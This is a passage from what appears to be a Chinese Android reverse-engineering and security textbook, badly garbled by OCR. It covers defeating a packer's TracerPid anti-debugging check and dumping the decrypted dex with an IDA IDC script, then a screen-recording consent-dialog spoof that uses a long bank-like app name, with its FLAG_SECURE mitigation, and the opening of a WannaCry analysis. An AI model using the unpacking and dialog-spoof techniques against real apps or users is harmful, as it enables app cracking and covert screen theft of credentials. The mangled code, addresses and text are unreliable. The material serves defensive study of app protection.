касКктеЙй2И1 


这 里 还 看 不 


途中 ， 会 


libc.so:^488499FC 


Fgets 


libc.so:^h8849008 
libc.so:^885496084 
libc.so:^8849f 86 


 Hibc.so:^885498088 


libc.so:^48849f0 86 
libc.so:^48849808C 
libc.so:^8849608E 
libc.so:^8849608E 
libc.so:^8849608E 


SUBS . V 
LDR 
MOU 
HOU 
ADD 
BGT 


loc ^884988E 
MOUS 


libc.so:^88498018 B 


到 什么 信息 ， 继 续 点 击 F8 键 单 步调 试 ， 如 下 所 示 : 


R9, 
R3, 
R7, 
RA, 
R3, 


R7, 
loc 


R1, #0 
=({unk_4007F 
RÜ 
R2 


PC ; unk ^8 


loc 54880598012 


HH 


 ^88590B6 


libc.so:58859055 © 
libc.so:^88549858 


LDR.U 
CHP 


libc.so:^48849605C 
libc.so:^884985E 
libc.so:^588498068 
libc.so:^88495062 
libc.so:^88498065 
libc.so:^5885498068 
libc.so:^88496068 
libc.so:^884986C 
libc.so:^8849606E 
libc.so:^8849072 
libc.s0:58849075 
libc.so:^88598076 
libc.so:^884907R 
libc.so:^884907C 
libc.so:^884907E 
libc.s0:5885498082 
libc.so: ^ 805496085 


а лыла X ML. шт 


看 到 有 memchr 和 memcpy 这 两 个 重要 函数 ， 


HOUCS 
HOUS 
HOU 
HOU 
BL 
LDR 
CBZ 
ADDS 
RSB.W 
SUBS 
HOU 
STHIR.U 
HOU 
MOU 
ВІ Х 
MOUS 
STRB 


RO. loc 10689995 
R8, #1 

R6, 
R3, 
R1, 
RA^, 


R8, КӨ 
R1, 
RS 
{RO, R3} 
Ró 


Кб 


TU, WÜ 
R8, [R5,R6] 


这 个 也 是 操作 字符 串 的 核心 点 ， 继 续 往 下 走 ， 如 下 所 示 : 


libc.so:588598B6 ; ----------------- 一 一 一 一 一 一 一 一 一 一 一 一 有 


libc.so:40049ABő 

libc.so:^885980B6 loc_40049ABő 

libc.so:^488598B6 

libc.so:^4800590B6 HOU RO, R7 
libc.so:^4885498B8 ; End of Function fiR8-[stack]:BEFDBFAA^ 
libc.so:^4885498B8 DCB OxhE ; H 
libc.so:40049AB8 ; ---------------- -.0СВ 8x61 ; a 
libc.so:h88498BC off h88590BC DCD unIDCB 8xóD ; m 
libc.so:^88498C8 dword 58859nC8 DCD DCB 8xó5 ; e 
libc.so:^88590Ch fileno DCB 9 DCB 68x3R ; : 
libc.so:^88598C5 DCB Ox4B ; K DCB 9 
libc.so:40049ACő DCB  8xf DCB 68xó^ ; d 
libc.so:^480590C7 DCB Өхла ; J DCB 8x65 ; e 
libc.so:40049AC8 DCB 8x7B ; (4 DCB 80x72 ; r 
libc.so:40049AC9 DCB Өхлд ; D DCB 6х2Е ; . 


A fgets 989065, RI 7 ROESGESSBJPJEEName, RuBROESZBE, КЛ: 


EE ш шшш j“ ЕРЕ тч 


[stack] :BEFDBF 44 
[stack] :BEFDBF 45 
[stack] :BEFDBF 6 
[stack] :BEFDBF ^7 
[stack] :BEFDBF 48 
[stack] :BEFDBF 49 
[stack] :BEFDBF ^f 
[stack] :BEFDBF 4B 
[stack] : BEFDBF AC 
[stack] :BEFDBF 4D 
[stack] :BEFDBF AE 
[stack] :BEFDBF AF 
[stack] :BEFDBF58 
[stack] :BEFDBF51 
[stack] :BEFDBF52 
[stack] :BEFDBF53 
[stack] :BEFDBF5A 
[stack] :BEFDBF55 
[stack] :BEFDBF56 
[stack] :BEFDBF57 
[stack] :BEFDBF58 


DCB 


DCB Í 


DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 
DCB 


DCB 
DCB 


全 部 内 容 是 Name: der.crackme0201, ， 这 就 是 status 文 件 的 第 一 行内 容 : 


rootíabltechn:^/ H cat Z/Zproc/16396/Zstatus 
fane: dev-craclaee26t | 
tate: t <tracing stop 


16396 
16396 
251 


TracerPid: 


TIgid: 
Pid: 
PPid: 


11348 


DCB | 


wa wa ча ча wa ча чи ча ча 
(D 3 D Z 


JR0R2EHXSstatusx P ERSSHG PIE, (BiislITracerPidBB( тШ ЖЕ УМтЫХТОе152А#й, ВТАА КА, 797 
间 ， 这 里 点 击 5 次 F9 键 ， 和 直接 运 行 到 读 取 TracerPid 那 行 的 内 容 的 fgets 断 点 处 ， 如 下 所 示 : 

° 1ibc.so:40049AB6 MOU R8, R7 

> libc.so:^884980B8 РОР. 4RA-R18,PC5 
libc.so:^80598B8 ; End of function F'Re-[stack] :BEFDBF 44 
libc.so:^80598B8 DCB 8x55 ; T 
libc.s0:58985890B8 = ----------------- DCB 8x72 ; r 
libc.so:^5^88596BC off  4B885980BC DCD unipcB 8x61 : a 
libc.so:^80598C8 dword 48845988 DCD DCE 8x63 ; c 
libc.so:^8849n0Ch fileno DCB 9 DCB 8x65 ; e 
libc.so:^4805986C5 DCB OX4B ; К DCB 8x72 : r 
libc.so:^88490Có DCB OXA DCB 8x58 ; P 
libc.so:40049AC7 DCB OX4A ; J DCB 8x69 : i 
libc.so:^88hH90C8 DCB 8x7B ; < DCB 8x65 - d 
libc.so:40049AC9 DCB Gx44 ; р DCB 80x38 - : 
libc.so:^88h9nCh DCB 8x78 = р | 


HR, 


-HH 入 


节省 时 


看 到 关键 的 内 容 TracerPid 字 段 了 ， 这 时 候 打 开 Hex View 查 看 16 进 制 的 内 存 数据 ， 如 下 所 示 : 


[9] Mex View-l 


-FFF8F88 | 


-FFF8F 1 


-FFF8F28 
-FFF8F38 


-FFF 8F 48 
-FFF 8F58 
-FFF 8F68 
-FFF 8F 7 8 


F1 
F1 
F1 
F1 
F1 
F8 
9F 


DE 


DE 


DE 


DE 


DE 
DE 
88 


OF 


FD 
FD 


FD 


FD 


FD 


FD 
2D 


B2 


E? 
E? 
E? 
E? 
E? 
E9 
E1 


F1 
F1 
F1 
F1 
F1 
D8 
Өң 


但 是 看 到 ， 这 并 没有 和 调试 页 面 View 位 置 相对 应 ， 
如 下 所 示 : 


DE 
DE 
DE 
DE 
DE 
DE 
44 
30 


查看 数据 很 费劲 ， 


FD 
FD 
FD 
FD 
FD 
C8 
30 


E7 


E7 
E7 
Fi 
E7 
Fi 
E1 
EÜ 


F1 
F1 


DE 
DE 
DE 
DE 
F1 DE 
F1 DE 
DO 68 
05 38 


F1 


F1 


FD 


FD 
FD 
FD 
FD 
FD 
C1 
31 


7 


E? 
E7 
E7 
E? 
E? 
EJ 
88 


F1 
F1 


F1 


F1 


F1 
SF 


96 


DE 
DE 
DE 
DE 
DE 
DE 
F8 
3F 


FD 


FD 
FD 
FD 
FD 
Ер 
PF 
A2 


E? 
E7 
E7 
E7 
E7 
E? 
F5 
81 


所 以 可 以 这 么 操作 ， 人 在 寄存 器 窗口 查看 到 RO 寄存 器 的 


a (в RO BEFDBFA^ | [stack]:BEF 


R1 88888888 y 
R2 88888888 y 
R3 8888488C wu 
Rh A4888DD9C „ debug887:da 
R5 BEFDBF^A44 ù [stack]-:BEF 
B8888811 y 


| a AL E rm ГЕ П | 4 а П 


这 里 就 是 TracerPid 字 段 在 内 人 存 的 地 址 ， 记 录 一 下 ， 然 后 在 Hex View 页 面 中 使 用 G 键 ， 进 行 跳 转 ， 一 定 要 注意 是 在 
HexView， 而 不 是 调试 页 面 ， 调 试 页 面 使 用 G 键 跳 转 到 的 是 指令 地 址 了 ， 如 图 24-20 所 示 。 


[s] Hex View-l 


IEFDBFD 5H 58 69 6W BB HB SB 91 19 Bü АЙ nr 19 00 АВ AF PPid..[h........ 
IEFDBF1h B7 91 6H 41 21 43 AD DE 3C BF FD BE 19 BB АЙ AF ..' R*C..«....... 
IEFDBFz 81 75 SF 41 34 CO FD BE DD 77 SF 41 34 CO FD BE ñu ЙН... ÀH... 


IEFDEF34 19 Bü ñB hn? 28 CH FD BE 9D 9^4 óó 41 28 LB FD BE  ....(..... Fñ(..- 
IEF DEF 44 H F2 61 63 65 72 58 69 65 3A B9 31 31 33 34 38 . TracerPid:.11354B 
'EFDBF54& Bñ HB Bh BB 31 Bh HB BB HB HB HB BH 94 3 B8 HB  ....1........ С (a 
'EFDBF6AR ИЙ HB BB BD 94 43 H8 НИ ИП BD HB BB од h3 B8 HB _.....UL tal. D ` 
ЕЕОВЕ Я BB BB BB BB 2С CH FD BE ИЙ BB ИЙ ИЙ 38 СӨ FD BE ....,....... B... 


'EFDBFSS ИЙ HB BB HB BD BD HB BB BD HB Bü BH HB BB DB DB ................ 


图 24-20 Hex View Jt 面 


这 里 看 到 TracerPid 的 内 存 内 容 了 ， 残 开始 修改 吧 ， 选 择 要 修改 的 内 容 : 是 11340 那 里 ， 如 图 24-21 所 示 。 


5g 69 65 3ñ TEL n4 ла аз nm т.е: 11340 


апай пп BB Synchronize with и Р r [a 
BS 40 HB BU Data format koe L . fà 
FD BE ИЙ Bü Col ' L...B... 
nn BB Columns кр 
BB өв Техї a we qr 
"Tw" Edit... [p | Фк 
на 1B = uu zl 
За 99 | E NUNC к É 26/stat 
Ch 7D | E 1*"hn.... 


图 24-21 修改 寄存 器 值 


FE Бч = œ "ы "ы E ma ы Мы 
E Fo = ШШ] = m m m om ü 


选择 内 容 开始 处 ， 右 击 ， 选 择 Edit， 进 入 修改 状态 ， 如 下 所 示 : 
65 ЗА 89 38 88 00 80 88 TracerPid:.8.... 
00 AA 86 Өй 91 43 8 40 = = = a аһ „(9 . = = a » „(а 


改 了 之 后 的 内 容 是 橘 黄色 的 ， 修 改 完成 之 后 ， 再 点 击 右键 


完成 修改 ， 颜 色 变 成 灰 土 色 了 ， 如 下 所 示 : 


38 [E 00 ве ве 
88 94 43 88 40 
00 94 43 08 40 


Data format 


Columns 


Save to file... 


Synchronize with 


选择 Apply changes， 如 图 24-22 所 示 。 


TracerPid:.8.... 
M. MM d HESS 
LOREMS, к nan ы e 


: 这 里 其 实 还 可 以 直接 修改 寄存 器 RO 的 值 ， 如 图 24-23 所 示 。 


= РЕШЕ 
„С 19 
„С 19 
EM 


图 24-22 ”保存 设置 


?6BB97 ; 
8885ER Jump 


Jump in a new window 


Open register window 


Zero value 


Modules Toggle value 


Increment value 


Decrement value 


aB [system 


"Hl /<su<ctemi 


Copy 


图 24-23 ”直接 修改 寄存 器 值 


这 时 候 束 修改 成 功 了 ， 继 续 使 用 F8 键 单 步调 试 下 去 ， 如 下 所 示 : 


debug125:72984386 ADD КӨ, SP, H8x6h 
debugi125:72985388 MOUS R1, 48x88 
debugi125:729854388 MOUS R2, Ró 
debugi125:72985438C ВІХ 283B 80 


debug125 


debug125 


:72984394 


:729854398 


ADDS 


R4, RO=[stack] 
D 


:BEFDBF 44 


debug125:729854396 СВ 0x54 ; T 

debug125:72984396 loc 729854396 DCB 8x72 ; r Il Ir42 : 2 
debug125:7298545396 MOUS R8, DCB 68x61 ; a 这 里 开始 和 0 作 比 较 了 
debug125:729854398 ВІХ Unk DCB 68x63 ; c 

debugi125:7298539C SUBS R8, DCB 8x65 ; e 

debug125:72985439EF QRRS Rh, DCB 68x72 ; r 

debug125:729843A0 LSRS R8, DCB 68x58 ; P 

debugi125:729854382 SUBS R8, DCB 68x69 ; i 

debug125:72985438^ B loc DCB 8x6^ ; d 

ED E orte mr de DCB 68x38 ; : 


"DR 


т A rn r m 


Six E Tib TracerPidzzEgRS(ERUIOXECTEUE T , лаАО ТЕЕ ERAR, Я РАА: 


[stack]:BEFDBFW1M 
[stack]:BEFDBFM15 
[stack ]:BEFDBF 46 
[stack ]:BEFDBF47 
[stack | :BEFDBF 48 
[stack] :BEFDBF 49 
[stack] :BEFDBF ^fi 
[stack] :BEFDBF 4B 
[stack] :BEFDBF 4C 
[stack |] :BEFDBF 4D 
[stack] :BEFDBF 4E 
[stack] :BEFDBF &F 


DCB 
DCE 
DCE 
DCB 
DCB 
DCE 
DCE 
DCB 
DCB 
DCE 
DCE 
DGB 


0x5 
0x72 
0x61 
0x63 
0x65 
0x72 
0х5 B 
0x69 
0x65 
üx3h 

9 
0x38 


ча ча ча ча ч ыа VERS чї. ча. ча N 


这 里 的 值 已 经 被 改 成 了 0， 所 以 就 骗 过 去 了 。 继 续 运 行 会 友 现 ， 又 进入 了 fopen 函 数 的 断 点 处 ， 而 且 查 看 还 是 读 取 status 驻 
件 。 这 个 也 不 好 奇 ， 因 为 反 调 试 检 测 上 衣 定 是 一 个 轮 询 机 制 ， 所 以 肯定 会 反复 地 读 取 这 个 文件 ，fopen 走 多 次 也 是 正音 的 ， 但 是 这 
个 反 调 试 肯定 是 在 子 线程 的 ， 所 以 只 要 到 了 主线 程 中 解密 dex 文 件 肯 定 到 了 dvmDexFileOpenPartial， 这 里 会 多 次 重复 上 面 的 操 
作 ， 修 改 多 次 TracerPid 的 值 。 这 里 就 不 演示 了 。 在 操作 的 过 程 中 修改 了 三 次 ， 当 没有 走 fopen 水 数 的 时 候 ， 过 到 了 这 个 错误 ， 
这 里 不 用 关心 ， 直 接点 击 OK 就 可 以 了 ， 如 图 24-24 所 示 。 


图 24-24 ”警告 对 话 框 


再 次 点 击 运 行 ， 如 下 所 示 : 


dataQapp&com.droider .crackme 82861 1.apk@classes.dex:72963124 
ataQ@app@com.droider .crackme 0281 1]. аркес1аѕѕеѕ .dex:72963124 
data(2app(àácom.droider.crackme8281 1.apk(3classes.dex:72963128 
data(s3appl(àacom.droider.crackme80281 1 .арк@с1 аѕ55е5 . бех : 7296312С 
data(23appisacom.droider.crackme80281 1.apk(3classes.dex:72963138 
data(3appisacom.droider.crackme8281 1 .аркес1аѕѕеѕ . Пех : 72963134 
data(s3app(acom.droider.crackme02801 1 .арк@с1аѕ55е5 . бех : 72963138 
dataQ@app@com.droider .сғаскте 0281 1.apk(3classes.dex:7296313C€ 
datat(gaapp(acom.droider .сгаскте 0201 1 .аркес1аѕѕ5есѕ . Пех : 72963130 
data(2app(acom.droider.crackme8281 1.apk(3classes.dex:72963154 
data(sapp(acom.droider.crackme8281 1.apk(3classes.dex:72963148 
data(23app(acom.droider.crackme8281 1.apk(aclasses.dex:7296315C€ 
data(3apptscom.droider.crackme8281 1 .аркес1аѕѕесѕ . бех : 729631560 
data(3appiscom.droider.crackme8281 1 .аркес1аѕѕесѕ . ех : 72963154 
data(s3app(acom.droider.crackme8281 1 .арк@с1 аѕ55е5 . ех : 72963158 
dataaappacom-droider .сеаскте 0201 1.apk(3classes.dex:7296315C€ 
dataQ@app@com.droider .crackme 0201 1 .аркес1аѕѕесѕ . Пех : 72963168 
datat(aapp(acom.droider .crackme 0201 1 .аркес1аѕ5еѕ5 . ех : 729631653 
data(s3applacom.droider.crackme8281 1 .арк@с1 аѕ5е5 . бех : 72963168 
dataaappacom-droider .crackme 0201 1.apk(3classes.dex:7296316€ 


这 里 说 明 已 经 开始 解密 dex 文 件 了 ， 应 该 离 成 功 不 远 了 ， 继 续 运行 ， 如 下 所 示 : 


libdum.so:^168277C  221dumDexFileOüpenPartialPKuiPPóDumDex 


ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 
ANDEQ 


libdum.so:4160277E MOUV R4, R2 
ibdum.so:41602780 MOUS R2, #0 
libdum.so:41602782 BL _212dexFileParsePKhji 
libdum.so:51682786 MOU R5, R8 
libdum.so:5^1682788 CBN2 R8, loc ^168279f 


libdum.so:^1682788 LDR R1, -(aDaluikum - 60x^41682795) 
libdum.s0o:5168278C MOUS R8, #6 
libdum.so:5168278bE LDR R2, -(aDexParseFailed - 60x51682796) 
libdum.so:51682798 ADD R1, PC ; "dalvikunm'" 
libdum.so:51682792 ADD R2, PC ; "DEX parse failed" 
libdum.so:5168279^4 BLX ипк 5^415DB565 

B loc 51682788 


libdum.so:516802798 


终于 到 了 想 要 的 地 方 了 ， 到 这 里 就 好 办 了 ， 直 接点 击 Shirt+F2 键 ， 打 开 脚 本 运行 窗口 ， 运 行 下 面 脚本 ， 如 图 24-25 所 示 。 


static main(void) 


{ 


auto fp, 
гр = 
end addr - 


for ( 


dex adar, 


rO + r1; 


dex addr 
fputc(Byte(dex addr), 


end ааах; 
topen("F:NNdump.dex", " 


wb"); 


dex addr « end addr; 
гр; 


dex addr ++ ) 


snippet list Flease enter zcript body 
static main(unid) 
Cb Default snippet * ` 
auto fp, dex addr, end adr; 
fp = fopen("E:XXdumnp.dex", "wb"; 
end addr = rü + r1; 
For ( dex addr = rü; dex addr < end айде; dex addr 
++ ) 


Ffputc(Byte(dex addr), fp); 


| e» Please wart... 


Running IDC seript 


Line 1 of 1 Line:4 Column:3B 


Scripting language Tab size 4 ы 


图 24-25 运行 脚本 


把 内 存 中 的 dex 保 存 到 F: Xdump.dex 中 。 这 里 R0 寄 存 器 就 是 dex 在 内 存 中 的 起 始 地 址 ，R1 寄 存 器 就 是 dex 文 件 的 大 小 ， 如 
图 24-26 所 示 。 


wr (тепега| registers 


RÜ 76BB97EL ww debug132-/6BB97EL 
H1 BBDBHERBRDHS x 

R2 BEFDBAIG w [stack|]j-BEFDB71TU 
Кэ 86DR6ZBH x 


图 24-26 ”查看 dex 文 件 的 起 始 地 址 和 文件 大 小 


使 用 G 键 ， 可 以 在 HexView 页 面 中 查看 RO 寄存 器 中 的 地 址 内 容 ， 如 下 所 示 : 


6BB97EC [| 65 78 Ва 30 33 35 88 E7 9B 26 бй 19 29 4C 40 ш кеки 
76BB97FC 6B ñ5 C9 BA 38 88 AD Bh Сб B2 88 FF B9 Еб 97 E7 KR---8---.......- 
76BB980C D8 ER 0^ 88 70 88 00 00 78 56 34 12 08 00 88 OB ....p...xUh..... 
76BB981C вө 88 08 OG 88 EA O4 00 31 BE 00 өө 78 08 00 вв ........ пехара 
76BB982C Өл 02 00 00 34 39 00 00 B2 02 88 00 hh 41 08 OO ....h9...... ра.. 
76BB983C Ер 82 вө 88 9с 61 08 88 ҳе OC OO 08 Oh 79 08 вв ..... AT MANC 


76BB984C 28 81 886 ӨЙ өч DB вв вв D^ EB 83 88 O4 FF 88 88  ................ 


jx Elis аеху УНТ, 


得 到 了 内 存 中 的 dex 数 据 之 后 ， 可 以 使 用 baksmali 工 具 转 化 成 Smali 源 码 ， 查 看 代码 逻辑 即 可 ， 这 里 不 再 演示 了 。 最 后 还 有 


一 步 : 还 原 apk。 下 一 节 介 绍 。 


24.3 ”如 何 还 原 应 用 


首先 修改 反 编 译 之 后 的 AndroidManifest.xml 中 的 内 容 : 
android:name-"com.shell.SuperApplication" 


把 这 段 内 容 删 除 ， 如 果 有 自己 的 Application 的 话 ， 就 改 成 自己 的 Application 即 可 ， 同 时 删除 assets 目 录 下 面 的 文件 。 然 后 
使 用 apktool 进 行 回 编译 ， 这 时 候 ， 先 不 要 着急 签名 apk， 而 是 蔡 换 classes.dex， 把 上 面 得 到 的 dump.dex 改 成 classes.dex 然 后 
直接 用 压缩 软件 ， 茶 换 未 签名 的 apk 中 的 dex 文 件 即 可 ， 最 后 再 进行 签名 操作 ， 完 成 还 原 apk 工 作 。 


245 ”本章 小 结 


本 章 用 案例 介绍 如 何 脱 掉 某 平台 加 窗 的 党 ， 其 实现 在 各 个 加 固 平 台 的 原理 都 差不多 ， 最 后 看 到 的 就 是 各 家 的 加 固 算 法 了 ， 所 
以 在 脱 沉 的 过 程 中 目标 也 很 明确 ， 就 是 dump 出 内 存 中 的 dex 文 件 即 可 。 不 管 它 上 层 用 什么 样 的 复杂 的 加 窗 拆 分 操作 ， 到 了 内 存 肯 
定 是 完整 的 dex 文 件 ， 所 以 现在 加 固 平 台 的 应 对 方法 也 是 一 个 思想 ， 就 是 不 让 你 dump 出 来 ， 就 是 让 你 给 dvmDexFileOpenPartial 函 


数 下 断 点 失败 ， 调 试 失败 。 
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前 几 章 介绍 了 Android 开 发 中 需要 注意 的 安全 问题 以 及 如 何 做 逆向 工作 , 但 是 有 时 候 光 有 这 些 知 识 还 不 够 做 到 百 分 百 安全 ， 
因为 一 个 系统 必定 会 有 一 些 漏洞 ， 而 这 些 漏洞 如 果 被 恶意 利用 ， 也 是 非常 危险 的 。 本 章 介 绍 开发 中 比较 常见 的 两 个 漏洞 : 文件 解 
压 漏 洞 和 孙 屏 功能 漏洞 。 


25.2. ЗБУТ 


25.2.1 ”漏洞 场景 


在 Android 5.0 中 新 增 了 一 个 API 来 进行 录制 屏幕 视频 。 在 当今 直播 和 游戏 那么 火 的 时 代 ， 录 制 也 是 非常 不 错 的 功能 ， 现 在 
很 多 应 用 器 是 利用 这 个 API 来 做 到 游戏 的 录制 效果 的 。 在 使 用 这 个 API 的 时 候 ， 系 统 会 给 一 个 授权 提示 ， 如 图 25-3 所 示 。 


МедіаРгојесііопі 5 RR SEE! 
屏幕 上 显示 的 所 有 内 容 。 


П 不 再 显示 


925-3 ”屏幕 录制 授权 提示 


这 个 对 话 框 是 系统 弹出 来 的 提示 消息 ， 主 要 由 两 部 分 组 成 ， 应 用 的 名 称 + 提 示 文 案 ， 看 似 是 一 个 很 平常 的 授权 对 话 框 ,但 是 
这 背后 却 有 一 个 很 大 的 界面 漏洞 ， 危 险 性 很 大 。 当 应 用 被 授权 了 ， 那 么 就 代表 这 个 应 用 可 以 监听 用 尸 设 备 的 屏幕 信息 。 


Android 系 统 中 在 弹出 对 话 框 的 时 候 ， 如 果 内 容 过 多 ， 会 采用 浴 动 样式 ， 来 展示 全 部 消息 ， 而 不 是 使 用 字符 省 略 的 方式 。 那 
么 就 存 在 一 个 问题 ， 如 果 把 应 用 的 名 称 故 意 弄 的 很 长 ， 导 人 怪 后 面 一 段 提示 文案 “将 开始 截取 您 的 屏幕 上 显示 的 所 有 内 容 ” 给 抵 到 | 
底部 ， 只 有 滑动 的 时 候 才 能 看 到 ， 这 样 来 骗取 用 户 点 击 “ 立 即 开始 ”。 同 时 再 把 应 用 的 名 称 改 成 一 些 银 行 或 者 是 社交 账号 ， 支 付 
应 用 的 提示 文案 ， 比 如 : “x x 宝 新 增 了 特性 http://www.hzcourse.com/resource/readBook? 
path=/openresources/teach ebook/uncompressed/17266/OEBPS/Text/... 点 击 立 即 开 始 ， 即 可 体验 ! " , РНЕ: 
开始 点 击 了 。 当 然 这 里 还 需要 一 个 功能 ， 就 是 监听 系统 的 TopActivity， 当 监听 到 用 户 打 开 了 银行 App 或 者 是 社交 App 的 时 候 ， 


束 去 申请 权限 ， 弹 出 对 话 框 ! 
下 面 通 过 MediaProjectionManager 源 码 来 分 析 一 下 ， 授 权 提 示 流 程 : 在 使 用 录制 屏幕 功能 的 时 候 ， 去 授权 页 面 调 用 的 是 


createScreenCapturelntent 广 法， 获取 授权 Intent: 


/** 


* Returns an Intent that <b>must</b> passed to startActivityForResult() 
* in order to start screen capture. The activity will prompt 
* the user whether to allow screen capture. The result of this 
* activity should be passed to getMediaProjection. 
ш i 
public Intent [qiie лш АПА) í 
Intent i - new Intent(); 
i.setClassName("com.android.systemui", 


"com.android.systemui.media.MediaProjectionPermissionActivity"); 
return i; 


这 里 调用 的 是 MediaProjectionPermissionActivity 来 进行 授权 : 


String appName = aInfo.loadLabel(packageManager).toString(); 


mDialog = new ALertDialog.Builder(this) 
.setIcon(aInfo.loadIcon(packageManager)) 
.setMessage(getString(R.string.media projection dialóg text, appName)) 
.setPositiveButton(R.string.media projection action text, this) 
.setNegativeButton(android.R.string.cancel, this) 
.setView(R.layout.remember permission checkbox) 
.setOnCancellistener(this) ! 


.create(); 获取 应 用 的 名 称 


mDialog.create(); 


((CheckBox) mDialog.findViewById(R.id.remember)).setOnCheckedChangelistener(this); 
mDialog.getWindow().setType(WindowManager.LayoutParams.TYPE SYSTEM ALERT); 


mDialog.show(); 


这 里 直接 用 系统 对 话 框 展示 了 。 


下 面 束 来 演示 一 个 例子 ， 比 如 现在 恶意 软件 在 后 台 监 听 到 了 用 户 局 动 了 某 某 应 用 ， 然 后 束 局 动 授权 界面 ， 如 图 25-4 所 示 。 


| 不 本 在 公共 场所 使 用 网 上 急行 防止 
2. ЖЕКШЕ. mens: — 


: ENIM, AREE 
95555-2842 — E Hi Bu. "is B 
开始 "按钮 继续 执行 


图 25-4 ”恶意 应 用 的 授权 界面 
恶意 App 的 名 称 为 : 
<string name-"app name" >XX 银 行 容 户 庙 注 意 事项 : An1、 趟 要 在 公共 场所 使 用 网 上 银行 ， 防 止 他 大 偷 看 您 的 密码 。\n2、 


这 融 看 到 了 提示 信息 ， 与 打开 银行 App 时 给 的 提示 信息 很 类 似 ， 用 户 会 感觉 很 正 单 ， 如 图 25-5 所 示 。 一 般 弹 出 的 提示 对 话 
框 ， 用 户 不 会 去 滑动 看 到 搬 部 ， 而 关键 提示 信息 融 在 底部 


ааа ХУ Е НУРЛАР 
容 。 


取消 2180995 


图 25-5 恶意 App 授 权 界 面 
如 果 用 户 氮 击 “ 立 即 开始 ” 融 相 当 于 授权 了 ， 那 么 恶意 App 融 在 后 人 台 偷 偷 录 制 你 的 屏幕 ， 当 你 输入 账号 和 密码 的 时 候 也 会 家 
记录 ， 再 把 录制 App 友 到 服务 痛 进 行 分 析 ， 账 号 融会 被 盗 取 ! 


25.2.2 ”漏洞 原因 分 析 


这 个 漏洞 其 实 融 是 一 个 界面 漏洞 ， 在 提示 信息 展示 的 时 候 没有 做 省 略 处理 ， 从 而 把 最 重要 的 提示 文案 给 隐藏 了 ， 导 致 用 尸检 
骗 ， 同 意 授 权 。 


该 漏洞 实际 上 是 由 于 Google 没 有 制定 合理 的 Android 应 用 名 称 规 范 导 致 ， 综 合 表现 为 如 下 两 点 : 
. 没有 规范 应 用 名 称 长 度 ， 使 得 应 用 名 称 可 为 任意 长 度 。 


没有 规范 应 用 名 称 字 符 集 ， 如 应 用 名 称 可 包含 换行 符 和 制 表 符 。 


25.2.3 ”漏洞 修复 


Google 在 后 续 的 6.0 系 统 中 修复 了 这 个 问题 ， 修 复 之 后 的 效果 如 图 25-6 所 示 。 


xXx 银行 客户 端 注 意 事 项 :... 将 开始 截 
取 您 的 屏 固 上 显示 的 所 有 内 容 。 


不 再 显示 


HH 。” ”立即 开始 


图 25-6 ”修复 之 后 的 授权 界面 


及 用 了 省 略 号 代 蔡 了 ， 不 会 把 重要 的 提示 信息 给 隐藏 了 。 那 么 对 于 5.0 系 统 的 用 户 该 怎么 办 呢 ? 这 个 漏洞 依旧 和 存在， 这 丈 要 
求 开 友 者 做 一 些 工作 了 ， 在 Android 中 涉及 用 尸 隐 私 的 Acitivity 中 (例如 登录 、 支 付 等 其 他 输入 敏感 信息 的 界面 中 ) 增加 属性 : 
WindowManager.LayoutParams.FLAG SECURE 


看 一 下 属性 源码 说 明 : 


ар: treat the content of the window as secure, preventing 


*|it from appearing in screenshots or from being viewed on non-secure 
*Idisplays. 
* 
* &p»See (link android.view.DisplaysFLAG SECURE; for more details about 
* secure surfaces and secure displays. 
ks 4 

public static final int 7 i4! 13 = 0x00002000; 


该 属性 能 防止 屏幕 被 规 图 和 录制 。 这 个 属性 就 是 可 以 防止 当前 Activity 不 会 被 录制 ， 可 以 做 一 个 案例 : 
/ /设置 当前 Activity 不 被 录制 


getWindow().setFlags(WindowManager.LlayoutParams.FLAG SECURE, 
WindowManager .LayoutParams.FLAG SECURE); 


使 用 MediaProjection 进 行 截 图 功能 ， 如 果 加 上 了 这 个 属性 ， 再 次 截图 ， 效 果 如 图 25-7 所 示 。 


xx 银行 客户 端 注意 事项 : 1、 不 要 在 . 


9257 应 用 截图 失败 


看 到 下 面 的 截图 是 一 片 漆 黑 ， 截 图 失败 ， 而 且 这 时 候 使 用 adb shell screencap 命 令 去 截图 也 是 失败， 如 图 25-8 所 示 。 


。 已 被 安全 政策 阻止 。 


图 25-8 ”应 用 截图 失败 提示 
从 这 里 可 以 看 出 ，adb shell screencap 和 和 screenrecord 命 令 底 层 的 实现 和 MediaProjection 是 一 样 的 。 
在 5.0 的 系统 中 ， 或 者 对 于 银行 App、 社 交 App、 文 付 App 等 ， 开 发 者 应 该 把 当前 登录 的 Activity 添 加 这 个 属性 ! 如 果 没 有 添 
加 的 话 ， 融 加 上 吧 ， 给 自己 的 App 加 上 一 份 保险 ! 


25.2.4 漏洞 总 结 


下 面 来 总 结 一 下 这 个 漏洞 : 
' 漏洞 产生 的 原因 : 因为 Google 在 处 理 对 话 框 提示 的 时 候 ， 没 有 做 字符 限制 ， 导 致 一 些 重要 的 提示 信息 被 遮挡 。 


漏洞 的 扼 险 : 恶意 App 利 用 这 个 漏洞 ， 把 自己 的 App 名 称 弄 得 很 长 ， 而 且 在 后 台 监 听 用 户 打 开 了 一 些 支付 App、 银 行 App 之 
就 弹出 这 个 授权 对 话 框 ， 但 是 因为 名 称 太 长 了 ， 重 要 的 提示 文案 被 盖 住 了 ， 用 户 很 难 发现 问 题 ， 授 权 之 后 就 被 录制 了 重要 信 


(m 
о 


0 X: Google 在 6.0 以 后 进行 了 修复 ， 使 用 字符 限制 功能 ， 但 是 对 于 没有 升级 到 6.0 的 用 户 ， 开 发 者 就 需要 在 自己 的 项 
目 中 给 Activity 添 加 安全 属性 ， 特 别 是 登录 页 面 ， 这 样 就 可 以 防止 当前 页 面 被 录制 或 者 截屏 了 。 


25.3 “本章 小 结 


本 章 主要 分 析 了 两 个 在 开发 中 常见 的 漏洞 : 解压 漏洞 和 录 屏 授权 漏洞 。 开 发 者 需要 在 开发 应 用 中 专门 针对 这 两 个 漏洞 进行 处 
理 。 


第 26 章 ”文件 加 密 病毒 Wannacry 样 本 分 析 


之 前 有 一 个 Wannacry 病 毒 样 本 在 PC 端 建 意 了 很 久 ， 它 是 用 RSA 算 法 加 密 文 件 ， 勒 索 钱财 ， 不 给 钱 就 删除 内 容 。 现 在 移动 设备 


